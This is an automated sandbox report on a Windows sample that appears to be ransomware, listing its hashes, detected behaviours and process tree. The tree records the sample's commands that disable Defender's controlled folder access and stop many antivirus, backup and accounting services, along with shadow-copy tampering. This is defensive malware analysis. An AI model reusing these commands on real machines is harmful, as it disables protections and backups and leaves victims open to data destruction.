Analysis
-
max time kernel
140s -
max time network
142s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
03-08-2024 03:37
Behavioral task
behavioral1
Sample
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
Resource
win7-20240708-en
Behavioral task
behavioral3
Sample
ae66e009e16f0fad3b70ad20801f48f2edb904fa5341a89e126a26fd3fc80f75.exe
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Resource
win7-20240729-en
Errors
General
-
Target
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
-
Size
91KB
-
MD5
be60e389a0108b2871dff12dfbb542ac
-
SHA1
14b4e0bfac64ec0f837f84ab1780ca7ced8d670d
-
SHA256
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d
-
SHA512
6051bec441434a80c34ee2752a3da9c3a0307cd1b551aa27a0f7f6f75b9bf64b172745d80f03eea054a03ebd2c493df21fd48d8fa3b706d46a6f7fee0e7c0641
-
SSDEEP
1536:QguHLgeS6umiCp31W4qYXgsLlOqrgB9GpF7LXdarTkCAKL5dsluhtvM4CoLT6QPg:D6seqCp31Hgsp9a9GTrda8CAKLTsWkyI
Malware Config
Signatures
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (63) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 496 cmd.exe -
Drops startup file 1 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 3040 sc.exe 2036 sc.exe 2120 sc.exe 496 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
net.exenet1.exenet.exenet.exenet1.exetaskkill.exenet.exenet1.exenet.exenet.exenet.exenet.exenet1.exenet.exesc.exenet1.exevssadmin.exenet.exenet.exevssadmin.exesc.exevssadmin.execmd.exenet1.exenet1.exenet1.exenet1.exenet.exenet.exenet1.exenet1.exevssadmin.exenet.exenet1.exevssadmin.exenet1.exenet.exetaskkill.exenet.exevssadmin.exenet1.exenotepad.exechoice.exenet.exenet1.execmd.exenet.exenet1.exenet1.exenet.exenet1.exenet1.exenet.exenet.exenet.exenet1.exenet1.exesc.exevssadmin.exePING.EXEpowershell.exenet.execmd.exefsutil.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language notepad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fsutil.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid process 1716 cmd.exe 2572 PING.EXE -
Interacts with shadow copies 3 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 1624 vssadmin.exe 1492 vssadmin.exe 1504 vssadmin.exe 1584 vssadmin.exe 1680 vssadmin.exe 1020 vssadmin.exe 2096 vssadmin.exe 1736 vssadmin.exe 1316 vssadmin.exe 2340 vssadmin.exe 1392 vssadmin.exe 892 vssadmin.exe 1252 vssadmin.exe 1572 vssadmin.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 1632 taskkill.exe 2244 taskkill.exe 1440 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
rundll32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_Classes\Local Settings rundll32.exe -
Opens file in notepad (likely ransom note) 2 IoCs
Processes:
notepad.exeNOTEPAD.EXEpid process 1268 notepad.exe 2952 NOTEPAD.EXE -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exepid process 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exepowershell.exetaskkill.exetaskkill.exetaskkill.exeAUDIODG.EXEdescription pid process Token: SeDebugPrivilege 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe Token: SeDebugPrivilege 852 powershell.exe Token: SeDebugPrivilege 2244 taskkill.exe Token: SeDebugPrivilege 1440 taskkill.exe Token: SeDebugPrivilege 1632 taskkill.exe Token: 33 2264 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2264 AUDIODG.EXE Token: 33 2264 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2264 AUDIODG.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exepid process 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exepid process 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1292 wrote to memory of 852 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe powershell.exe PID 1292 wrote to memory of 852 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe powershell.exe PID 1292 wrote to memory of 852 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe powershell.exe PID 1292 wrote to memory of 852 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe powershell.exe PID 1292 wrote to memory of 1784 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 1784 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 1784 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 1784 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 2832 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 2832 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 2832 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 2832 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 620 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 620 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 620 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 620 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 1844 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 1844 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 1844 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 1844 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 2620 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 2620 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 2620 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 2620 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1784 wrote to memory of 2624 1784 net.exe net1.exe PID 1784 wrote to memory of 2624 1784 net.exe net1.exe PID 1784 wrote to memory of 2624 1784 net.exe net1.exe PID 1784 wrote to memory of 2624 1784 net.exe net1.exe PID 1292 wrote to memory of 2100 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 2100 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 2100 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 2100 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2832 wrote to memory of 2560 2832 net.exe net1.exe PID 2832 wrote to memory of 2560 2832 net.exe net1.exe PID 2832 wrote to memory of 2560 2832 net.exe net1.exe PID 2832 wrote to memory of 2560 2832 net.exe net1.exe PID 2620 wrote to memory of 2576 2620 net.exe net1.exe PID 2620 wrote to memory of 2576 2620 net.exe net1.exe PID 2620 wrote to memory of 2576 2620 net.exe net1.exe PID 2620 wrote to memory of 2576 2620 net.exe net1.exe PID 620 wrote to memory of 2856 620 net.exe net1.exe PID 620 wrote to memory of 2856 620 net.exe net1.exe PID 620 wrote to memory of 2856 620 net.exe net1.exe PID 620 wrote to memory of 2856 620 net.exe net1.exe PID 2100 wrote to memory of 2516 2100 net.exe net1.exe PID 2100 wrote to memory of 2516 2100 net.exe net1.exe PID 2100 wrote to memory of 2516 2100 net.exe net1.exe PID 2100 wrote to memory of 2516 2100 net.exe net1.exe PID 1844 wrote to memory of 2488 1844 net.exe net1.exe PID 1844 wrote to memory of 2488 1844 net.exe net1.exe PID 1844 wrote to memory of 2488 1844 net.exe net1.exe PID 1844 wrote to memory of 2488 1844 net.exe net1.exe PID 1292 wrote to memory of 2600 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 2600 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 2600 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 2600 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 2540 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 2540 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 2540 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 2540 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 3024 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 3024 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 3024 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1292 wrote to memory of 3024 1292 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe -
System policy modification 1 TTPs 2 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe"C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe"1⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1292 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:852
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:2624
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵
- System Location Discovery: System Language Discovery
PID:2560
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵
- System Location Discovery: System Language Discovery
PID:2856
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:2488
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:2576
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DefWatch /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵PID:2516
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:2600
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:2984
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y2⤵PID:2540
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵
- System Location Discovery: System Language Discovery
PID:2432
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SavRoam /y2⤵
- System Location Discovery: System Language Discovery
PID:3024 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵
- System Location Discovery: System Language Discovery
PID:2408
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y2⤵
- System Location Discovery: System Language Discovery
PID:3032 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵
- System Location Discovery: System Language Discovery
PID:1592
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y2⤵PID:2324
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:1696
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y2⤵PID:2976
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:2308
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵
- System Location Discovery: System Language Discovery
PID:2888 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵
- System Location Discovery: System Language Discovery
PID:2716
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:2384
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵
- System Location Discovery: System Language Discovery
PID:2232
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y2⤵PID:2332
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵
- System Location Discovery: System Language Discovery
PID:2640
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y2⤵
- System Location Discovery: System Language Discovery
PID:348 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵PID:2756
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y2⤵
- System Location Discovery: System Language Discovery
PID:2356 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:932
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y2⤵
- System Location Discovery: System Language Discovery
PID:2180 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵
- System Location Discovery: System Language Discovery
PID:2692
-
-
-
